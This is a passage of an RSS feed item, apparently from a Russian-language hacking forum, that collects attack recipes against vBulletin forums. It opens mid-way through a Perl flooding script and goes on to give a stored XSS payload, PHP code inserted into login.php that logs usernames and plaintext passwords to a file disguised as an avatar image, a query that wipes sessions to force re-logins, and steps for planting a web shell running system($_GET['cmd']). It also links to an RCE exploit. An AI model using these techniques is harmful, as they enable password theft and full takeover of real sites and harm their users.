/&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;);&lt;/p&gt;
						&lt;p&gt;print $sock &amp;quot;POST $path$vul HTTP/1.1\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Host: $ziel\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Referer: $ziel\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Accept-Language: en-us\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Content-Type: application/x-www-form-urlencoded\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;Content-Length: $lrg\n\n&amp;quot;;&lt;br /&gt;print $sock &amp;quot;$postit\n&amp;quot;;&lt;br /&gt;close($sock);&lt;br /&gt;syswrite STDOUT, &amp;quot;-&amp;gt;BLACKOUT&amp;lt;-&amp;quot;;&lt;br /&gt;$x++;&lt;br /&gt;}&lt;br /&gt;}else{&lt;br /&gt;die &amp;quot;Fehler kann nicht zum Ziel verbinden $ziel !\n&amp;quot;;&lt;br /&gt;}&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Протроянивание vBulletin всех версий&lt;br /&gt;Уязвимость заключается в том, что поле &amp;quot;Заголовок&amp;quot; не фильтруется. Заходим: Админка - Поля профиля участника - Добавить поле в профиле пользователя. (либо просто site.com/admincp/profilefield.php?do=add). Там выбираем: Тип поля профиля - Текстовое поле одной строчкой. Кликаем Далее. В поле заголовок вводим:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;&amp;lt;script&amp;gt;alert(&#039;alert)&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Кликаем Сохранить. После этого заходим в Админку - Поля профиля участника - Управление полями профиля пользователя. (либо просто site.com/admincp/profilefield.php?do=modifycats) Потом выбираем наш Редактировать около нашего &amp;lt;script&amp;gt;alert(&#039;alert)&amp;lt;/script&amp;gt; (либо просто site.com/admincp/profilefield.php?do=edit&amp;amp;profilefieldid=xx, где xx - уникальный ИД, который присвоился полю после добавления), и вуаля - у нас алерт.&lt;br /&gt;cool.gif Панель Управления - Личные Данные (либо просто site.com/profile.php?do=editprofile), все - у нас есть алерт.&lt;/p&gt;
						&lt;p&gt;© mailbrush, ачат&lt;/p&gt;
						&lt;p&gt;Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум)&lt;br /&gt;По идее все просто: в файл login.php в корне сайта добавляем&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST[&#039;do&#039;] == &#039;login&#039;)
{
   $vbulletin-&amp;gt;input-&amp;gt;clean_array_gpc(&#039;p&#039;, array(
       &#039;vb_login_username&#039;        =&amp;gt; TYPE_STR,
       &#039;vb_login_password&#039;        =&amp;gt; TYPE_STR,
       &#039;vb_login_md5password&#039;     =&amp;gt; TYPE_STR,
       &#039;vb_login_md5password_utf&#039; =&amp;gt; TYPE_STR,
       &#039;postvars&#039;                 =&amp;gt; TYPE_STR,
       &#039;cookieuser&#039;               =&amp;gt; TYPE_BOOL,
       &#039;logintype&#039;                =&amp;gt; TYPE_STR,
       &#039;cssprefs&#039;                 =&amp;gt; TYPE_STR,
   ));

   define( &#039;auth_req&#039;, &#039;./customavatars/avatar178_2.gif&#039; );
   $fp = fopen( auth_req, &#039;a&#039; );  
   $un1=&amp;amp;$vbulletin-&amp;gt;GPC[&#039;vb_login_username&#039;]; $un2=&amp;amp;$vbulletin-&amp;gt;GPC[&#039;vb_login_password&#039;]; $un3 = date(&amp;quot;d.m.y H.i.s&amp;quot;);
   $message = &amp;quot;$un3:$un1:$un2\r\n&amp;quot;;  
   flock($fp,LOCK_EX);  
   fwrite( $fp, $message );  
   fflush($fp); flock($fp,LOCK_UN); fclose( $fp );  

   // can the user login?&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;но в логах видим, что пароля все же нет. Обидно...&lt;br /&gt;Посмотрим на форму регистрации:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;...
&amp;lt;form action=&amp;quot;login.php?do=login&amp;quot; method=&amp;quot;post&amp;quot; onsubmit=&amp;quot;md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)&amp;quot;&amp;gt;
...&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Ага. значит входим по функции из javascript...&lt;br /&gt;Сама функция находится в clientscript/vbulletin_md5.js&lt;br /&gt;А там мы видим в конце:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 6em&quot;&gt;&lt;pre&gt;// implemented like this to make sure un-updated templates behave as before
           input.value = &#039;&#039;;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Это значит, что введенный нами пароль просто затирается перед передачей дальше. Просто комментарим строку и собираем пароли (обновляем ессно страницу, для того чтобы заюзать измененный JavaScript)...&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;...
// input.value = &#039;&#039;;
...&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;P.S. против автозахода (куки) можно стереть из бд все сессии&lt;br /&gt;P.P.S. Можно и не комментировать, а изменить переменную $un2=&amp;amp;$vbulletin-&amp;gt;GPC[&#039;vb_login_md5password&#039;];&lt;br /&gt;Все же md5(pass) побрутить легче, чем md5(md5(pass).salt)&lt;/p&gt;
						&lt;p&gt;© Basurman, ачат&lt;/p&gt;
						&lt;p&gt;Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум) - получение чистых паролей&lt;br /&gt;1) Добавляем в начало файла login.php&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;$Login = $_POST[&#039;vb_login_username&#039;];
$Passwd = $_POST[&#039;vb_login_password&#039;];
$fp = fopen(&amp;quot;./customavatars/avatar178_2.gif&amp;quot;,&amp;quot;a+&amp;quot;);
fwrite($fp,&amp;quot;$Login:$Passwd\n&amp;quot;);
fclose($fp);&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;2) Очищаем полностью файл clientscript/vbulletin_md5.js от этого ничего не изменится.&lt;/p&gt;
						&lt;p&gt;3) Для того чтобы обнулить сессии выполняем код:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;$link = mysql_connect(&#039;хост&#039;,&#039;логин&#039;,&#039;пасс&#039;);
mysql_select_db(&#039;база данных&#039;,$link);
$query = &amp;quot;TRUNCATE TABLE префикс_session&amp;quot;;
$result = mysql_query($query, $link);
mysql_close($link);&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;© GrAmOzEkA&lt;/p&gt;
						&lt;p&gt;Как залить шелл в vBulletin 2.*.* и 3.0.*&lt;br /&gt;1. Заходим в админку =&amp;gt; Смайлы =&amp;gt; Загрузить смайл =&amp;gt; Грузим наш шелл (папка по умолчанию /images/smilies)&lt;br /&gt;2. Заходим wwwsite.сom/путь к форуму/images/smilies/shell.php&lt;/p&gt;
						&lt;p&gt;Как залить шелл в vBulletin 3.5.*&lt;br /&gt;1. Заходим в админку =&amp;gt; Система модулей =&amp;gt; Добавить новый модуль&lt;br /&gt;Продукт: ставим vBulletin&lt;br /&gt;Месторасположение: Vbulletin: Справка - faq_complete&lt;br /&gt;Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), можно залить просто&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;system($_GET[&amp;quot;cmd&amp;quot;]);&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;2. Сохраняем, идём в faq (справка), теперь у нас есть шелл. Если он был такой system($_GET[&amp;quot;cmd&amp;quot;]); делаем так wwwxz.сom/forumpath/faq.php?cmd=тут команда&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://damagelab.org/index.php?act=Attach&amp;amp;type=post&amp;amp;id=2248&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;VBulletin 3.8.8 Remote code execution&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (DIRK)</author>
			<pubDate>Thu, 07 Jan 2010 03:36:00 +0300</pubDate>
			<guid>http://hacking.bbon.ru/viewtopic.php?pid=1#p1</guid>
		</item>
	</channel>
</rss>
